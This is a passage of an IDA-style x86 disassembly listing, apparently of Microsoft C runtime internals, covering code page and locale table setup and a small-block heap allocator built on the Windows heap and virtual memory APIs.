loc_4039E6: ; CODE XREF: sub_4038A7+7E�j
; sub_4038A7+8B�j
push 1
pop eax
loc_4039E9: ; CODE XREF: sub_4038A7+14F�j
or byte_407221[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_4039E9
push esi
call sub_403A8A
pop ecx
mov Locale, eax
mov dword_40711C, 1
jmp short loc_403A16
; ---------------------------------------------------------------------------
loc_403A10: ; CODE XREF: sub_4038A7+74�j
mov dword_40711C, ebx
loc_403A16: ; CODE XREF: sub_4038A7+167�j
xor eax, eax
mov edi, offset dword_407110
stosd
stosd
stosd
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A22: ; CODE XREF: sub_4038A7+51�j
cmp dword_4070AC, ebx
jz short loc_403A38
loc_403A2A: ; CODE XREF: sub_4038A7+27�j
call sub_403ABD
loc_403A2F: ; CODE XREF: sub_4038A7+131�j
; sub_4038A7+179�j
call sub_403AE6
loc_403A34: ; CODE XREF: sub_4038A7+1D�j
xor eax, eax
jmp short loc_403A3B
; ---------------------------------------------------------------------------
loc_403A38: ; CODE XREF: sub_4038A7+181�j
or eax, 0FFFFFFFFh
loc_403A3B: ; CODE XREF: sub_4038A7+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4038A7 endp
; =============== S U B R O U T I N E =======================================
sub_403A40 proc near ; CODE XREF: sub_4038A7+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_4070AC, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403A60
mov dword_4070AC, 1
jmp GetOEMCP
; ---------------------------------------------------------------------------
loc_403A60: ; CODE XREF: sub_403A40+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_403A75
mov dword_4070AC, 1
jmp GetACP
; ---------------------------------------------------------------------------
loc_403A75: ; CODE XREF: sub_403A40+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_403A89
mov eax, dword_4070D4
mov dword_4070AC, 1
locret_403A89: ; CODE XREF: sub_403A40+38�j
retn
sub_403A40 endp
; =============== S U B R O U T I N E =======================================
sub_403A8A proc near ; CODE XREF: sub_4038A7+118�p
; sub_4038A7+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_403AB7
sub eax, 4
jz short loc_403AB1
sub eax, 0Dh
jz short loc_403AAB
dec eax
jz short loc_403AA5
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403AA5: ; CODE XREF: sub_403A8A+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_403AAB: ; CODE XREF: sub_403A8A+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A8A+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_403AB7: ; CODE XREF: sub_403A8A+9�j
mov eax, 411h
retn
sub_403A8A endp
; =============== S U B R O U T I N E =======================================
sub_403ABD proc near ; CODE XREF: sub_4038A7:loc_403A2A�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_407220
rep stosd
stosb
xor eax, eax
mov edi, offset dword_407110
mov CodePage, eax
mov dword_40711C, eax
mov Locale, eax
stosd
stosd
stosd
pop edi
retn
sub_403ABD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AE6 proc near ; CODE XREF: sub_4038A7:loc_403A2F�p
CharType = word ptr -514h
var_314 = byte ptr -314h
DestStr = byte ptr -214h
MultiByteStr = byte ptr -114h
CPInfo = _cpinfo ptr -14h
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+CPInfo]
push esi
push eax ; lpCPInfo
push CodePage ; CodePage
call GetCPInfo ; GetCPInfo
cmp eax, 1
jnz loc_403C1F
xor eax, eax
mov esi, 100h
loc_403B10: ; CODE XREF: sub_403AE6+34�j
mov [ebp+eax+MultiByteStr], al
inc eax
cmp eax, esi
jb short loc_403B10
mov al, [ebp+CPInfo.LeadByte]
mov [ebp+MultiByteStr], 20h
test al, al
jz short loc_403B61
push ebx
push edi
lea edx, [ebp+CPInfo.LeadByte+1]
loc_403B2F: ; CODE XREF: sub_403AE6+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_403B56
sub ecx, eax
lea edi, [ebp+eax+MultiByteStr]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_403B56: ; CODE XREF: sub_403AE6+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_403B2F
pop edi
pop ebx
loc_403B61: ; CODE XREF: sub_403AE6+42�j
push 0 ; int
lea eax, [ebp+CharType]
push Locale ; Locale
push CodePage ; CodePage
push eax ; lpCharType
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 1 ; dwInfoType
call sub_40371C
push 0 ; int
lea eax, [ebp+DestStr]
push CodePage ; CodePage
push esi ; cchDest
push eax ; lpDestStr
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push esi ; dwMapFlags
push Locale ; Locale
call sub_4046FE
push 0 ; int
lea eax, [ebp+var_314]
push CodePage ; CodePage
push esi ; cchDest
push eax ; lpDestStr
lea eax, [ebp+MultiByteStr]
push esi ; cbMultiByte
push eax ; lpMultiByteStr
push 200h ; dwMapFlags
push Locale ; Locale
call sub_4046FE
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+CharType]
loc_403BDC: ; CODE XREF: sub_403AE6+135�j
mov dx, [ecx]
test dl, 1
jz short loc_403BFA
or byte_407221[eax], 10h
mov dl, [ebp+eax+DestStr]
loc_403BF2: ; CODE XREF: sub_403AE6+127�j
mov byte_407120[eax], dl
jmp short loc_403C16
; ---------------------------------------------------------------------------
loc_403BFA: ; CODE XREF: sub_403AE6+FC�j
test dl, 2
jz short loc_403C0F
or byte_407221[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_403BF2
; ---------------------------------------------------------------------------
loc_403C0F: ; CODE XREF: sub_403AE6+117�j
and byte_407120[eax], 0
loc_403C16: ; CODE XREF: sub_403AE6+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_403BDC
jmp short loc_403C68
; ---------------------------------------------------------------------------
loc_403C1F: ; CODE XREF: sub_403AE6+1D�j
xor eax, eax
mov esi, 100h
loc_403C26: ; CODE XREF: sub_403AE6+180�j
cmp eax, 41h
jb short loc_403C44
cmp eax, 5Ah
ja short loc_403C44
or byte_407221[eax], 10h
mov cl, al
add cl, 20h
loc_403C3C: ; CODE XREF: sub_403AE6+174�j
mov byte_407120[eax], cl
jmp short loc_403C63
; ---------------------------------------------------------------------------
loc_403C44: ; CODE XREF: sub_403AE6+143�j
; sub_403AE6+148�j
cmp eax, 61h
jb short loc_403C5C
cmp eax, 7Ah
ja short loc_403C5C
or byte_407221[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_403C3C
; ---------------------------------------------------------------------------
loc_403C5C: ; CODE XREF: sub_403AE6+161�j
; sub_403AE6+166�j
and byte_407120[eax], 0
loc_403C63: ; CODE XREF: sub_403AE6+15C�j
inc eax
cmp eax, esi
jb short loc_403C26
loc_403C68: ; CODE XREF: sub_403AE6+137�j
pop esi
leave
retn
sub_403AE6 endp
; =============== S U B R O U T I N E =======================================
sub_403C6B proc near ; CODE XREF: sub_402D47+9�p
; sub_402D9F+D�p ...
cmp dword_407448, 0
jnz short locret_403C86
push 0FFFFFFFDh
call sub_4038A7
pop ecx
mov dword_407448, 1
locret_403C86: ; CODE XREF: sub_403C6B+7�j
retn
sub_403C6B endp
; =============== S U B R O U T I N E =======================================
sub_403C87 proc near ; CODE XREF: sub_402D9F+9D�p
; sub_4030A5+BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_403CB4
push esi
call sub_403D68
pop ecx
test eax, eax
push esi
jz short loc_403CA6
push eax
call sub_403D93
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_403CA6: ; CODE XREF: sub_403C87+13�j
push 0 ; dwFlags
push hHeap ; hHeap
call HeapFree
loc_403CB4: ; CODE XREF: sub_403C87+7�j
pop esi
retn
sub_403C87 endp
; =============== S U B R O U T I N E =======================================
sub_403CB6 proc near ; CODE XREF: sub_402D9F+3A�p
; sub_402D9F+6F�p ...
arg_0 = dword ptr 4
push dword_4070E0
push [esp+4+arg_0]
call sub_403CC8
pop ecx
pop ecx
retn
sub_403CB6 endp
; =============== S U B R O U T I N E =======================================
sub_403CC8 proc near ; CODE XREF: sub_403CB6+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_403CF1
loc_403CCF: ; CODE XREF: sub_403CC8+27�j
push [esp+arg_0]
call sub_403CF4
test eax, eax
pop ecx
jnz short locret_403CF3
cmp [esp+arg_4], eax
jz short locret_403CF3
push [esp+arg_0]
call sub_40494D
test eax, eax
pop ecx
jnz short loc_403CCF
loc_403CF1: ; CODE XREF: sub_403CC8+5�j
xor eax, eax
locret_403CF3: ; CODE XREF: sub_403CC8+13�j
; sub_403CC8+19�j
retn
sub_403CC8 endp
; =============== S U B R O U T I N E =======================================
sub_403CF4 proc near ; CODE XREF: sub_403CC8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_406F28
ja short loc_403D0C
push esi
call sub_4040BE
test eax, eax
pop ecx
jnz short loc_403D28
loc_403D0C: ; CODE XREF: sub_403CF4+B�j
test esi, esi
jnz short loc_403D13
push 1
pop esi
loc_403D13: ; CODE XREF: sub_403CF4+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi ; dwBytes
push 0 ; dwFlags
push hHeap ; hHeap
call HeapAlloc
loc_403D28: ; CODE XREF: sub_403CF4+16�j
pop esi
retn
sub_403CF4 endp
; =============== S U B R O U T I N E =======================================
sub_403D2A proc near ; CODE XREF: sub_403382+20�p
push 140h ; dwBytes
push 0 ; dwFlags
push hHeap ; hHeap
call HeapAlloc
test eax, eax
mov lpMem, eax
jnz short loc_403D47
retn
; ---------------------------------------------------------------------------
loc_403D47: ; CODE XREF: sub_403D2A+1A�j
and dword_4070F4, 0
and dword_4070F8, 0
push 1
mov dword_4070F0, eax
mov dword_4070E8, 10h
pop eax
retn
sub_403D2A endp
; =============== S U B R O U T I N E =======================================
sub_403D68 proc near ; CODE XREF: sub_403C87+A�p
arg_0 = dword ptr 4
mov eax, dword_4070F8
lea ecx, [eax+eax*4]
mov eax, lpMem
lea ecx, [eax+ecx*4]
loc_403D78: ; CODE XREF: sub_403D68+26�j
cmp eax, ecx
jnb short loc_403D90
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_403D92
add eax, 14h
jmp short loc_403D78
; ---------------------------------------------------------------------------
loc_403D90: ; CODE XREF: sub_403D68+12�j
xor eax, eax
locret_403D92: ; CODE XREF: sub_403D68+21�j
retn
sub_403D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D93 proc near ; CODE XREF: sub_403C87+16�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_403E59
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403DEB
mov [ebp+arg_4], edi
loc_403DEB: ; CODE XREF: sub_403D93+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403E3D
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403E19
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403E3D
; ---------------------------------------------------------------------------
loc_403E19: ; CODE XREF: sub_403D93+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403E3D
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403E3D: ; CODE XREF: sub_403D93+60�j
; sub_403D93+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_403E59: ; CODE XREF: sub_403D93+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_403E67
push 3Fh
pop edi
loc_403E67: ; CODE XREF: sub_403D93+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403F16
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_403E92
mov [ebp+arg_4], edx
mov ecx, edx
loc_403E92: ; CODE XREF: sub_403D93+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_403EA4
mov edi, edx
loc_403EA4: ; CODE XREF: sub_403D93+10D�j
cmp ecx, edi
jz short loc_403F13
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403EFB
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403ED7
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403EFB
; ---------------------------------------------------------------------------
loc_403ED7: ; CODE XREF: sub_403D93+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403EFB
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403EFB: ; CODE XREF: sub_403D93+11E�j
; sub_403D93+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_403F13: ; CODE XREF: sub_403D93+113�j
mov edx, [ebp+var_8]
loc_403F16: ; CODE XREF: sub_403D93+DD�j
cmp [ebp+var_14], 0
jnz short loc_403F25
cmp [ebp+arg_4], edi
jz loc_403FAE
loc_403F25: ; CODE XREF: sub_403D93+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_403FAE
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_403F82
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F71
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_403F71: ; CODE XREF: sub_403D93+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_403FAB
; ---------------------------------------------------------------------------
loc_403F82: ; CODE XREF: sub_403D93+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_403F98
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_403F98: ; CODE XREF: sub_403D93+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_403FAB: ; CODE XREF: sub_403D93+1ED�j
mov ebx, [ebp+var_C]
loc_403FAE: ; CODE XREF: sub_403D93+18C�j
; sub_403D93+1B6�j
mov eax, [ebp+var_10]
mov [edx], ebx
mov [ebx+edx-4], ebx
dec dword ptr [eax]
jnz loc_4040B9
mov eax, dword_4070F4
test eax, eax
jz loc_4040AB
mov ecx, dword_4070EC
mov edi, VirtualFree
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h ; dwFreeType
push ebx ; dwSize
push ecx ; lpAddress
call edi ; VirtualFree
mov ecx, dword_4070EC
mov eax, dword_4070F4
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_4070F4
mov ecx, dword_4070EC
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_4070F4
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_4070F4
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_404039
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_4070F4
loc_404039: ; CODE XREF: sub_403D93+29B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_4040AB
push ebx ; dwFreeType
push 0 ; dwSize
push dword ptr [eax+0Ch] ; lpAddress
call edi ; VirtualFree
mov eax, dword_4070F4
push dword ptr [eax+10h] ; lpMem
push 0 ; dwFlags
push hHeap ; hHeap
call HeapFree
mov eax, dword_4070F8
mov edx, lpMem
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_4070F4
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_404970
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_4070F8
cmp eax, dword_4070F4
jbe short loc_40409D
sub eax, 14h
loc_40409D: ; CODE XREF: sub_403D93+305�j
mov ecx, lpMem
mov dword_4070F0, ecx
jmp short loc_4040AE
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_403D93+233�j
; sub_403D93+2AA�j
mov eax, [ebp+arg_0]
loc_4040AE: ; CODE XREF: sub_403D93+316�j
mov dword_4070F4, eax
mov dword_4070EC, esi
loc_4040B9: ; CODE XREF: sub_403D93+226�j
pop edi
pop esi
pop ebx
leave
retn
sub_403D93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040BE proc near ; CODE XREF: sub_403CF4+E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_4070F8
mov edx, lpMem
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_4040FE
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_40410E
; ---------------------------------------------------------------------------
loc_4040FE: ; CODE XREF: sub_4040BE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_40410E: ; CODE XREF: sub_4040BE+3E�j
mov eax, dword_4070F0
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_404135
loc_40411C: ; CODE XREF: sub_4040BE+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404135
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_40411C
loc_404135: ; CODE XREF: sub_4040BE+5C�j
; sub_4040BE+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_4041B3
mov ebx, edx
loc_40413C: ; CODE XREF: sub_4040BE+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404158
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404156
add ebx, 14h
jmp short loc_40413C
; ---------------------------------------------------------------------------
loc_404156: ; CODE XREF: sub_4040BE+91�j
cmp ebx, eax
loc_404158: ; CODE XREF: sub_4040BE+83�j
jnz short loc_4041B3
loc_40415A: ; CODE XREF: sub_4040BE+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_404170
cmp dword ptr [ebx+8], 0
jnz short loc_40416D
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_40415A
; ---------------------------------------------------------------------------
loc_40416D: ; CODE XREF: sub_4040BE+A5�j
cmp ebx, [ebp+var_4]
loc_404170: ; CODE XREF: sub_4040BE+9F�j
jnz short loc_404198
mov ebx, edx
loc_404174: ; CODE XREF: sub_4040BE+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_404188
cmp dword ptr [ebx+8], 0
jnz short loc_404186
add ebx, 14h
jmp short loc_404174
; ---------------------------------------------------------------------------
loc_404186: ; CODE XREF: sub_4040BE+C1�j
cmp ebx, eax
loc_404188: ; CODE XREF: sub_4040BE+BB�j
jnz short loc_404198
call sub_4043C7
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4041AC
loc_404198: ; CODE XREF: sub_4040BE:loc_404170�j
; sub_4040BE:loc_404188�j
push ebx
call sub_404478
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_4041B3
loc_4041AC: ; CODE XREF: sub_4040BE+D8�j
xor eax, eax
jmp loc_4043C2
; ---------------------------------------------------------------------------
loc_4041B3: ; CODE XREF: sub_4040BE+7A�j
; sub_4040BE:loc_404158�j ...
mov dword_4070F0, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4041DA
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_404211
loc_4041DA: ; CODE XREF: sub_4040BE+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_40420E
loc_4041F7: ; CODE XREF: sub_4040BE+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_4041F7
loc_40420E: ; CODE XREF: sub_4040BE+137�j
mov edx, [ebp+var_4]
loc_404211: ; CODE XREF: sub_4040BE+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_40423A
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_40423A: ; CODE XREF: sub_4040BE+16D�j
; sub_4040BE+183�j
test ecx, ecx
jl short loc_404243
shl ecx, 1
inc edi
jmp short loc_40423A
; ---------------------------------------------------------------------------
loc_404243: ; CODE XREF: sub_4040BE+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_404260
push 3Fh
pop esi
loc_404260: ; CODE XREF: sub_4040BE+19D�j
cmp esi, edi
jz loc_404375
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4042D1
cmp edi, 20h
jge short loc_4042A0
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042A0: ; CODE XREF: sub_4040BE+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_4042CE
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_4042D1
; ---------------------------------------------------------------------------
loc_4042CE: ; CODE XREF: sub_4040BE+1D6�j
; sub_4040BE+203�j
mov ebx, [ebp+arg_0]
loc_4042D1: ; CODE XREF: sub_4040BE+1B0�j
; sub_4040BE+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_404381
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_404372
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_404343
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_404331
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_404331: ; CODE XREF: sub_4040BE+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_404372
; ---------------------------------------------------------------------------
loc_404343: ; CODE XREF: sub_4040BE+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_40435C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_40435C: ; CODE XREF: sub_4040BE+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_404372: ; CODE XREF: sub_4040BE+24E�j
; sub_4040BE+283�j
mov ecx, [ebp+var_8]
loc_404375: ; CODE XREF: sub_4040BE+1A4�j
test ecx, ecx
jz short loc_404384
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404384
; ---------------------------------------------------------------------------
loc_404381: ; CODE XREF: sub_4040BE+229�j
mov ecx, [ebp+var_8]
loc_404384: ; CODE XREF: sub_4040BE+2B9�j
; sub_4040BE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4043BA
cmp ebx, dword_4070F4
jnz short loc_4043BA
mov ecx, [ebp+var_4]
cmp ecx, dword_4070EC
jnz short loc_4043BA
and dword_4070F4, 0
loc_4043BA: ; CODE XREF: sub_4040BE+2E0�j
; sub_4040BE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4043C2: ; CODE XREF: sub_4040BE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4040BE endp
; =============== S U B R O U T I N E =======================================
sub_4043C7 proc near ; CODE XREF: sub_4040BE+CC�p
mov eax, dword_4070F8
mov ecx, dword_4070E8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_40440A
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax ; dwBytes
push lpMem ; lpMem
push edi ; dwFlags
push hHeap ; hHeap
call HeapReAlloc
cmp eax, edi
jz short loc_40445A
add dword_4070E8, 10h
mov lpMem, eax
mov eax, dword_4070F8
loc_40440A: ; CODE XREF: sub_4043C7+11�j
mov ecx, lpMem
push 41C4h ; dwBytes
push 8 ; dwFlags
lea eax, [eax+eax*4]
push hHeap ; hHeap
lea esi, [ecx+eax*4]
call HeapAlloc
cmp eax, edi
mov [esi+10h], eax
jz short loc_40445A
push 4 ; flProtect
push 2000h ; flAllocationType
push 100000h ; dwSize
push edi ; lpAddress
call VirtualAlloc ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40445E
push dword ptr [esi+10h] ; lpMem
push edi ; dwFlags
push hHeap ; hHeap
